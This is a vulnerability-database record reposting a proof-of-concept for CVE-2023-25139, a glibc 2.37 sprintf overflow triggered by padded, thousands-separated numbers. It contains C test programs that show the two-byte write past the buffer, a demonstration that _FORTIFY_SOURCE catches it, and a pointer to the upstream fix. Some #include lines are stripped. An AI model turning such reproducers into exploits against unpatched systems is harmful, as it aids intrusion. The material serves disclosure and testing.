{"uuid": "2d1a038d-8a94-47d9-b677-719df2714648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-25139", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/2576", "content": "\ud83d\udd25\ud83d\udd25\ud83d\udd25glibc-2.37 - incorrect printf output for integers with thousands separator and width field(CVE-2023-25139, BOF)\nsprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.\n\nConsider the following C program:\n\n#include \n#include \n\nint main (void)\n{\n  if (setlocale (LC_ALL, \"\"))\n    {\n      printf (\"1234567890123:\\n\");\n      printf (\"%0+ -'13ld:\\n\", 1234567L);\n    }\n  return 0;\n}\n\nand try it with a locale that has a thousands separator, such as \"LC_ALL=en_US.utf8\".\n\nWith glibc up to 2.36,  Vincent get as expected:\n1234567890123:\n+1,234,567   :\n\nConfirmed that this could potentially cause a buffer overflow with sprintf, something like below.  This will occur in the corner case where an application computes the size of buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.\n\n#include \n#include \n#include \n\nint main (void)\n{\n  char buf[strlen (\"1234567890123:\") + 1];\n  __builtin_memset (buf, 'x', sizeof (buf));\n  if (setlocale (LC_ALL, \"\"))\n    {\n      printf (\"1234567890123:\\n\");\n      printf (\"%0+ -'13ld:\\n\", 1234567L);\n      sprintf (buf, \"%0+ -'13ld:\", 1234567L);\n      for (size_t i = 0; i < strlen (\"1234567890123:\") + 1; i++)\n  {\n    printf (\"%c\", buf[i]);\n  }\n      printf (\"\\n\");\n    }\n  return 0;\n}\n\nTo finish, building with _FORTIFY_SOURCE should catch this problem immediately:\n\n\ud83d\udcbe$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.c\n\nAnd run:\n\ud83d\udcbe$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ld-linux-x86-64.so.2 --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test\n1234567890123:\n+1,234,567     :\n*** buffer overflow detected ***: terminated\nAborted (core dumped)\n\n\ud83d\udee1Fixed here( github mirror, backport to release/2.37/master ): \"Account for grouping in printf width\".", "creation_timestamp": "2023-02-25T17:01:11.000000Z"}